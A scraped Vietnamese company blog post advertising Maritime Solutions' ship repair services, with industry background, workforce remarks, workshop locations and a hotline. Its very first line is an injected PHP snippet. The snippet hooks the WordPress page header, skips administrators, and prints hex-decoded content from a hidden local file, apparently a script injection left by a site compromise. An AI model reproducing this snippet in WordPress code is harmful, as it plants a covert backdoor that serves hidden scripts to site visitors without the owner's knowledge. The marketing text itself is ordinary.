if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Maritime Solutions - dịch vụ sửa chữa tàu biển giá cạnh tranh

0768303666

.st0{fill:#FFFFFF;}

Tin tức

Maritime Solutions – dịch vụ sửa chữa tàu biển giá cạnh tranh

 Tháng Năm 8, 2021

By  minhvu

Ngành dịch vụ sửa chữa tàu biển ra đời và ngày càng phát triển. Song cũng khiến chủ tàu lo lắng khi lựa chọn một nơi uy tín sửa chữa tàu giá cạnh tranh.

Tình hình ngành sửa chữa tàu biển hiện nay

Trong quá trình vận hành và khai thác thì có rất nhiều nguyên nhân làm cho những con tàu bị ăn mòn, hư hại và xuống cấp theo thời gian. Để đảm bảo được chất lượng cũng như độ bền cho các con tàu thì một vấn đề lớn đặt ra chính là cần phải sửa chữa. Sữa chữa tàu biển là một dịch vụ nhằm đảm bảo yêu cầu kỹ thuật cao cũng như đảm bảo được thời gian sửa chữa ít nhất. Bởi sửa chữa tàu biển thì nó liên quan mật thiết đến ý nghĩa kinh tế.

Ngành dịch vụ sửa chữa tàu biển đang ngày một phát triển
Ngành dịch vụ sửa chữa tàu biển đang ngày một phát triển

Khi các ngành du lịch biển đang ngày một phát triển, kéo theo ngành dịch vụ sửa chữa tàu biển phát triển theo. Dù có bước phát triển nhưng có đến 40% tàu biển Việt Nam phải mang tàu ra nước ngoài sửa chữa. Với dịch vụ đắt đỏ và chi phí đi lại lớn, khiến cho nhiều chủ tàu phái đau đầu với các khoản chi tiêu nhằm tân trang con tàu của mình.

Về nhân lực

Trình độ tay nghề của công nhân đóng tàu Việt Nam không thua kém gì so các nước, đáp ứng được tiêu chuẩn cao của thế giới. Tuy nhiên, hiện nay các trường đại học chuyên ngành; hoặc cao đẳng, dạy nghề rất khó tuyển sinh đầu vào đối với các ngành nghề phục vụ đóng tàu. Trong khi một công nhân đào tạo đúng chuyên ngành để đảm đương được công việc cần ít nhất 2 đến 3 năm kinh nghiệm.

Những thuận lợi và khó khăn

Việt Nam là một trong 10 quốc gia có chỉ số cao nhất về độ dài của bờ biển ở ba hướng Đông, Nam và Tây Nam. Với những đặc điểm đó, chúng ta là nước có vị trí thuận lợi trong ngành công nghiệp biển.

Hiện nay, nhu cầu vận chuyển bằng đường biển cũng tăng cao. Vì thế, ngành công nghiệp đóng tàu sẽ có nhiều cơ hội về thị trường.

Tuy nhiên, ngành công nghiệp tàu biển nước ta vẫn còn nhiều khó khăn. Do ảnh hưởng của khủng hoảng ngành cơ khí đóng tàu thế giới. Trong những năm qua, một số doanh nghiệp đã gặp những khó khăn hạn chế; mất khả năng thanh toán…

Từ đây, các con tàu lớn ở Việt Nam thường phải mang sang các nước lân cận để sửa chữa. Gây tốn kém chi phí và làm gián đoạn sự phát triển của ngành công nghiệp tàu biển ở nước ta.

Nhiệm vụ cơ bản của dịch vụ sửa chữa tàu giá cạnh tranh

  • Cần phải đảm bảo sự hoạt động bình thường cho con tàu trong suốt quá trình khai thác, ngăn ngừa các hư hỏng, hao mòn của thiết bị và vỏ tàu.
  • Đảm bảo thời gian sửa chữa nhanh chóng để đưa con tàu tiếp tục hoạt động
  • Trang bị lại và cải tiến các tính năng khai thác của con tàu, kéo dài tuổi thọ cho con tàu

>>Có thể bạn quan tâm: Thiết bị AIS – giải pháp hàng hải hàng đầu cho tàu, thuyền

Dịch vụ sửa chữa tàu giá cạnh tranh chỉ có tại Maritime Solutions

Với lợi thế vừa là đơn vị khai thác tàu vừa làm dịch vụ đại lý. Hơn ai hết chúng tôi hiểu rõ nhu cầu của các chủ tàu. Chúng tôi có thể tư vấn giúp họ những tác nghiệp tối ưu để giảm chi phí. Tối ưu hóa các yêu cầu về chất lượng và chi phí với khách hàng

Xưởng sửa chữa, bảo dưỡng tàu biển tại Maritime Solutions
Xưởng sửa chữa, bảo dưỡng tàu biển tại Maritime Solutions

Xưởng sửa chữa tàu biển của chúng tôi rộng khắp cả nước. Với các cơ sở lớn nhỏ tại Hải Phòng, Hà Nội, Quảng Ninh,… Với đội ngũ kỹ sư có trình độ chuyên môn nghiệp vụ cao, được đào tạo cơ bản. Song song với đội ngũ cán bộ khoa học là đội ngũ thợ công nhân lành nghề; tuổi đời trung bình là 40 tuổi, giàu kinh nghiệm. Chúng tôi không những đảm đương tốt việc sửa chữa cho các tàu trong các đơn vị vận tải biển; mà còn mở rộng phạm vi hoạt động, mang dịch vụ tới cho các khách hàng trong và ngoài nước. 

Ngoài các dịch vụ sửa chữa tàu biển, công ty cổ phần giải pháp hàng hải Việt Nam – Maritime Solutions còn cung cấp nhiều các dịch vụ hàng hải khác. Đơn cử như: dịch vụ du thuyền; cung cấp các thiết bị máy hàng hải; bán và bảo dưỡng các dòng máy Cummins nhập khẩu chính hãng…

Đội ngũ tư vấn viên của chúng tôi rất vui lòng đón nhận các câu hỏi từ quý khách hàng. Còn chờ đợi gì mà không gọi ngay cho chúng tôi qua hotline: 0768303666. Để được trải nghiệm các dịch vụ uy tín, chất lượng mà giá rẻ đến bất ngờ.

minhvu


Your Signature

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}

Liên hệ với chúng tôi để được tư vấn Dịch vụ và giá cả tốt nhất 

>